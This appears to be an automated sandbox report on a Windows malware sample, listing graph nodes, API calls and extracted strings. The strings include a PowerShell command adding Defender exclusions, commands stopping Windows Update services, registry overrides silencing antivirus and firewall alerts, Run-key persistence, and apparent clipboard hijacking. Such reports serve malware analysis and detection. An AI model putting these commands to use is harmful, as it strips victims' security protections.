6097->6081 6098 40eba1 6099 40ebaa 6098->6099 6100 40ec9d 6099->6100 6101 40ec13 lstrcmpiW 6099->6101 6102 40ec93 SysFreeString 6101->6102 6103 40ec26 6101->6103 6102->6100 6104 40e990 2 API calls 6103->6104 6106 40ec34 6104->6106 6105 40ec85 6105->6102 6106->6102 6106->6105 6107 40ec63 lstrcmpiW 6106->6107 6108 40ec75 6107->6108 6109 40ec7b SysFreeString 6107->6109 6108->6109 6109->6105 5804 406de4 5813 406d8a 5804->5813 5805 406dba lstrcmpiW 5805->5813 5806 406f35 FindNextFileW 5807 406f51 FindClose 5806->5807 5808 406d5e lstrcmpW 5806->5808 5810 406f5e 5807->5810 5812 406d74 lstrcmpW 5808->5812 5808->5813 5809 406e21 PathMatchSpecW 5811 406e42 wsprintfW SetFileAttributesW DeleteFileW 5809->5811 5809->5813 5811->5813 5812->5813 5813->5805 5813->5806 5813->5809 5814 406e9f PathFileExistsW 5813->5814 5817 4067a0 11 API calls 5813->5817 5814->5813 5815 406eb5 wsprintfW wsprintfW 5814->5815 5815->5813 5816 406f1f MoveFileExW 5815->5816 5816->5806 5817->5813 6110 40792a ExitThread 5818 40e070 5824 401470 5818->5824 5820 40e084 5821 40e0af 5820->5821 5822 40e095 WaitForSingleObject 5820->5822 5823 401330 8 API calls 5822->5823 5823->5821 5825 401483 5824->5825 5826 401572 5824->5826 5825->5826 5827 40a740 7 API calls 5825->5827 5826->5820 5828 401498 CreateEventA socket 5827->5828 5829 4014cf 5828->5829 5832 4014d5 5828->5832 5830 401330 8 API calls 5829->5830 5830->5832 5831 4014e2 htons setsockopt bind 5833 401546 5831->5833 5834 401558 CreateThread 5831->5834 5832->5826 5832->5831 5835 401330 8 API calls 5833->5835 5834->5826 5837 401100 5834->5837 5836 40154c 5835->5836 5836->5820 5838 401115 ioctlsocket 5837->5838 5839 4011e4 5838->5839 5841 40113a 5838->5841 5840 40ab60 _invalid_parameter 3 API calls 5839->5840 5843 4011ea 5840->5843 5842 4011cd WaitForSingleObject 5841->5842 5844 40a990 9 API calls 5841->5844 5845 401168 recvfrom 5841->5845 5846 4011ad InterlockedExchangeAdd 5841->5846 5842->5838 5842->5839 5844->5841 5845->5841 5845->5842 5848 401000 5846->5848 5849 401014 5848->5849 5850 40a740 7 API calls 5849->5850 5853 40103b 5849->5853 5850->5853 5852 40105b 5860 401580 5852->5860 5859 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5853->5859 5855 4010ec 5855->5841 5856 4010a3 IsBadReadPtr 5857 401071 5856->5857 5857->5855 5857->5856 5858 4010d8 memmove 5857->5858 5858->5857 5859->5852 5861 401592 5860->5861 5862 4015a5 memcpy 5860->5862 5864 40a990 9 API calls 5861->5864 5863 4015c1 5862->5863 5863->5857 5865 40159f 5864->5865 5865->5862 6111 40d6b0 6116 40d710 6111->6116 6113 40d6de 6115 40d710 send 6115->6113 6117 40d721 send 6116->6117 6118 40d6c3 6117->6118 6119 40d73e 6117->6119 6118->6113 6118->6115 6119->6117 6119->6118 6120 40d930 6121 40d934 6120->6121 6122 40bbb0 5 API calls 6121->6122 6123 40d950 WaitForSingleObject 6121->6123 6124 40d550 209 API calls 6121->6124 6125 40d975 6121->6125 6122->6121 6123->6121 6123->6125 6124->6121 6126 4059b0 GetWindowLongW 6127 4059d4 6126->6127 6128 4059f6 6126->6128 6129 4059e1 6127->6129 6130 405a67 IsClipboardFormatAvailable 6127->6130 6136 405a46 6128->6136 6137 405a2e SetWindowLongW 6128->6137 6145 4059f1 6128->6145 6133 405a04 SetClipboardViewer SetWindowLongW 6129->6133 6134 4059e7 6129->6134 6131 405a83 IsClipboardFormatAvailable 6130->6131 6132 405a7a 6130->6132 6131->6132 6138 405a98 IsClipboardFormatAvailable 6131->6138 6141 405ab5 OpenClipboard 6132->6141 6160 405b7c 6132->6160 6135 405be4 DefWindowProcA 6133->6135 6139 405b9d RegisterRawInputDevices ChangeClipboardChain 6134->6139 6134->6145 6140 405a4c SendMessageA 6136->6140 6136->6145 6137->6145 6138->6132 6139->6135 6140->6145 6142 405ac5 GetClipboardData 6141->6142 6141->6160 6144 405add GlobalLock 6142->6144 6142->6145 6143 405b85 SendMessageA 6143->6145 6144->6145 6146 405af5 6144->6146 6145->6135 6147 405b08 6146->6147 6148 405b29 6146->6148 6150 405b3e 6147->6150 6151 405b0e 6147->6151 6149 40d250 13 API calls 6148->6149 6152 405b14 GlobalUnlock CloseClipboard 6149->6152 6167 4057f0 6150->6167 6151->6152 6161 405680 6151->6161 6156 405b67 6152->6156 6152->6160 6175 404970 lstrlenW 6156->6175 6159 40ab60 _invalid_parameter 3 API calls 6159->6160 6160->6143 6160->6145 6163 40568b 6161->6163 6162 405691 lstrlenW 6162->6163 6164 4056a4 6162->6164 6163->6162 6163->6164 6165 40a950 _invalid_parameter 7 API calls 6163->6165 6166 4056c1 lstrcpynW 6163->6166 6164->6152 6165->6163 6166->6163 6166->6164 6172 4057fd 6167->6172 6168 405803 lstrlenA 6168->6172 6173 405816 6168->6173 6169 405740 2 API calls 6169->6172 6170 40a950 _invalid_parameter 7 API calls 6170->6172 6172->6168 6172->6169 6172->6170 6172->6173 6174 40ab60 _invalid_parameter 3 API calls 6172->6174 6209 4057a0 6172->6209 6173->6152 6174->6172 6183 4049a4 6175->6183 6176 404bfd 6176->6159 6177 404e81 StrStrW 6179 404e94 6177->6179 6180 404e98 StrStrW 6177->6180 6178 404c0f 6178->6176 6178->6177 6179->6180 6181 404eab 6180->6181 6182 404eaf StrStrW 6180->6182 6181->6182 6184 404ec2 6182->6184 6183->6176 6183->6178 6186 404d90 StrStrW 6183->6186 6196 404ed8 6184->6196 6214 4048a0 lstrlenW 6184->6214 6186->6178 6187 404dbb StrStrW 6186->6187 6187->6178 6188 404de6 StrStrW 6187->6188 6188->6178 6189 4054aa StrStrW 6193 4054c4 StrStrW 6189->6193 6194 4054bd 6189->6194 6190 40544f StrStrW 6191 405462 6190->6191 6192 40546b StrStrW 6190->6192 6191->6189 6192->6191 6195 405487 StrStrW 6192->6195 6197 4054d7 6193->6197 6198 4054de StrStrW 6193->6198 6194->6193 6195->6191 6196->6176 6196->6189 6196->6190 6197->6198 6199 4054f1 6198->6199 6200 4054f8 StrStrW 6198->6200 6199->6200 6201 405512 StrStrW 6200->6201 6202 40550b 6200->6202 6203 405525 lstrlenA 6201->6203 6202->6201 6203->6176 6205 4055ff GlobalAlloc 6203->6205 6205->6176 6206 40561a GlobalLock 6205->6206 6206->6176 6207 40562d memcpy GlobalUnlock OpenClipboard 6206->6207 6207->6176 6208 40565a EmptyClipboard SetClipboardData CloseClipboard 6207->6208 6208->6176 6210 4057ab 6209->6210 6211 4057b1 lstrlenA 6210->6211 6212 405740 2 API calls 6210->6212 6213 4057e4 6210->6213 6211->6210 6212->6210 6213->6172 6217 4048c4 6214->6217 6215 404911 iswalpha 6215->6217 6218 40492c iswdigit 6215->6218 6216 40490d 6216->6196 6217->6215 6217->6216 6217->6218 6218->6217 5866 4084f9 5867 408502 5866->5867 5868 408511 34 API calls 5867->5868 5869 409346 5867->5869 6219 405fbd 6221 405f51 6219->6221 6220 40ab60 _invalid_parameter 3 API calls 6222 405fc8 LeaveCriticalSection 6220->6222 6223 405fa6 memcpy 6221->6223 6224 405fbb 6221->6224 6223->6224 6224->6220 6226 40ac3e 6227 40ab60 _invalid_parameter 3 API calls 6226->6227 6230 40abfd 6227->6230 6228 40ac12 6229 40a950 _invalid_parameter 7 API calls 6229->6230 6230->6228 6230->6229 6231 40ac14 memcpy 6230->6231 6231->6230

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749sleepfilesynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 6 407dcb-407df6 RegOpenKeyExW 3->6 7 407d9f-407dc5 RegSetValueExW RegCloseKey 3->7 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 6->8 9 407df8-407e1e RegSetValueExW RegCloseKey 6->9 7->6 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 15 407ed6-407f01 RegOpenKeyExW 12->15 16 407eaa-407ed0 RegSetValueExW RegCloseKey 12->16 17 407b36-407b78 Sleep wsprintfW CopyFileW 14->17 18 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->18 19 407f03-407f29 RegSetValueExW RegCloseKey 15->19 20 407f2f-407f5a RegOpenKeyExW 15->20 16->15 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 17->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 17->23 18->17 21 407ac8-407afb wcslen RegSetValueExW 18->21 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 32 407cc3-407cf6 wcslen RegSetValueExW 24->32 34 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->34 35 40801f-40804a RegOpenKeyExW 25->35 26->25 27->17 28->27 44 407b21-407b23 ExitProcess 28->44 30 407c1b-407c22 RegCloseKey 29->30 31 407bef-407c11 RegCloseKey call 40f400 29->31 30->22 31->30 49 407c13-407c15 ExitProcess 31->49 37 407d24-407d2b RegCloseKey 32->37 38 407cf8-407d1a RegCloseKey call 40f400 32->38 34->35 40 408050-4080d3 RegSetValueExW * 4 RegCloseKey 35->40 41 4080d9-408104 RegOpenKeyExW 35->41 37->3 38->37 52 407d1c-407d1e ExitProcess 38->52 40->41 45 4081f0-40821b RegOpenKeyExW 41->45 46 40810a-4081ea RegSetValueExW * 7 RegCloseKey 41->46 47 408221-408301 RegSetValueExW * 7 RegCloseKey 45->47 48 408307-40831c Sleep call 40d180 45->48 46->45 47->48 54 408491-40849a 48->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 48->55 55->54
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                    • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                    • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                    • wsprintfW.USER32 ref: 004079DA
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                    • wcscmp.NTDLL ref: 00407A13
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                    • API String ID: 4172876685-159212852
                                                                                                                                    • Opcode ID: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                    • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                    • Opcode Fuzzy Hash: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                    • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 82 4068e0-4068f5 _chkstk 83 4068f7-4068f9 82->83 84 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 82->84 85 406f64-406f67 83->85 86 4069d2-4069f3 call 40f1f0 84->86 87 406a14-406a23 PathFileExistsW 84->87 86->87 99 4069f5-406a0e SetFileAttributesW DeleteFileW 86->99 89 406ac4-406acd 87->89 90 406a29-406a38 PathFileExistsW 87->90 91 406af5-406b04 PathFileExistsW 89->91 92 406acf-406ada call 4064a0 89->92 94 406a59-406a68 PathFileExistsW 90->94 95 406a3a-406a53 SetFileAttributesW DeleteFileW 90->95 100 406b06-406b26 call 40f1f0 91->100 101 406b47-406b56 PathFileExistsW 91->101 92->91 113 406adc-406af0 call 40f1f0 92->113 96 406a6a-406a7b CreateDirectoryW 94->96 97 406a8c-406a9b PathFileExistsW 94->97 95->94 96->97 102 406a7d-406a86 SetFileAttributesW 96->102 97->89 105 406a9d-406ab3 CopyFileW 97->105 99->87 100->101 114 406b28-406b41 SetFileAttributesW DeleteFileW 100->114 103 406b58-406b62 101->103 104 406bca-406bd9 PathFileExistsW 101->104 102->97 103->104 109 406b64-406b71 PathFileExistsW 103->109 111 406c75-406c96 FindFirstFileW 104->111 112 406bdf-406bee PathFileExistsW 104->112 105->89 110 406ab5-406abe SetFileAttributesW 105->110 109->104 115 406b73-406b89 CopyFileW 109->115 110->89 118 406c9c-406d54 111->118 119 406f5e 111->119 116 406bf0-406bf6 112->116 117 406c2c-406c32 112->117 113->91 114->101 115->104 123 406b8b-406ba9 SetFileAttributesW PathFileExistsW 115->123 124 406c12-406c27 call 406660 116->124 125 406bf8-406c10 call 406660 116->125 121 406c34-406c4c call 406660 117->121 122 406c4e-406c63 call 406660 117->122 126 406d5e-406d72 lstrcmpW 118->126 119->85 143 406c66-406c6f SetFileAttributesW 121->143 122->143 123->104 130 406bab-406bc4 SetFileAttributesW DeleteFileW 123->130 142 406c2a 124->142 125->142 132 406d74-406d88 lstrcmpW 126->132 133 406d8a 126->133 130->104 132->133 139 406d8f-406da0 132->139 140 406f35-406f4b FindNextFileW 133->140 141 406db1-406db8 139->141 140->126 144 406f51-406f58 FindClose 140->144 145 406de6-406def 141->145 146 406dba-406dd7 lstrcmpiW 141->146 142->143 143->111 144->119 149 406df1 145->149 150 406df6-406e07 145->150 147 406dd9 146->147 148 406ddb-406de2 146->148 147->141 148->145 149->140 152 406e18-406e1f 150->152 153 406e21-406e3e PathMatchSpecW 152->153 154 406e8f-406e98 152->154 155 406e40 153->155 156 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 153->156 157 406e9a 154->157 158 406e9f-406eae PathFileExistsW 154->158 155->152 156->154 157->140 159 406eb0 158->159 160 406eb5-406f05 wsprintfW * 2 158->160 159->140 162 406f07-406f1d call 4067a0 160->162 163 406f1f-406f2f MoveFileExW 160->163 162->140 163->140
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                    • API String ID: 495142193-638321828
                                                                                                                                    • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                    • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                    Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 744 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 745 4067f5-406809 lstrcmpW 744->745 746 4068cf-4068d2 744->746 747 406821 745->747 748 40680b-40681f lstrcmpW 745->748 750 40689c-4068b2 FindNextFileW 747->750 748->747 749 406823-40686c wsprintfW * 2 748->749 751 406886-406896 MoveFileExW 749->751 752 40686e-406884 call 4067a0 749->752 750->745 753 4068b8-4068c9 FindClose RemoveDirectoryW 750->753 751->750 752->750 753->746
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                    • wsprintfW.USER32 ref: 004067C5
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                    • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                    • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                    • wsprintfW.USER32 ref: 0040683A
                                                                                                                                    • wsprintfW.USER32 ref: 0040685A
                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                    • API String ID: 92872011-445461498
                                                                                                                                    • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                    • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                    Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                      • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                      • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                    • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                    • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                      • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                      • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                      • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                      • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                    • String ID: 239.255.255.250$X#A
                                                                                                                                    • API String ID: 726339449-2206458040
                                                                                                                                    • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                    • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                    • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                    • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                      • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                      • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                      • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                      • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                    • Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                    • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                    • Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                    • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
